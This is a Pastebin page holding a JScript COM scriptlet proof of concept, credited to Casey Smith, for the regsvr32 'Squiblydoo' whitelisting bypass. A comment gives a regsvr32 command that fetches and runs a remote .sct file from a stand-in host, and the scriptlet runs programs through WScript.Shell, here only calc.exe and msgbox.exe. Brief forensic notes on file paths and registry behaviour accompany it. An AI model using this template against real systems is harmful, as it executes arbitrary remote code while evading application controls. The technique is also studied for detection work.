Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?XML version="1.0"?>
- <scriptlet>
- <registration
- description="Bandit"
- progid="Bandit"
- version="1.00"
- classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
- >
- <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- <!-- DFIR -->
- <!-- .sct files are downloaded and executed from a path like this -->
- <!-- Though, the name and extension are arbitary.. -->
- <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
- <!-- Based on current research, no registry keys are written, since call "uninstall" -->
- <!-- Proof Of Concept - Casey Smith @subTee -->
- <script language="JScript">
- <![CDATA[
- var r = new ActiveXObject("WScript.Shell").Run("msgbox.exe");
- ]]>
- </script>
- </registration>
- <public>
- <method name="Exec"></method>
- </public>
- <script language="JScript">
- <![CDATA[
- function Exec()
- {
- var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
- }
- ]]>
- </script>
- </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement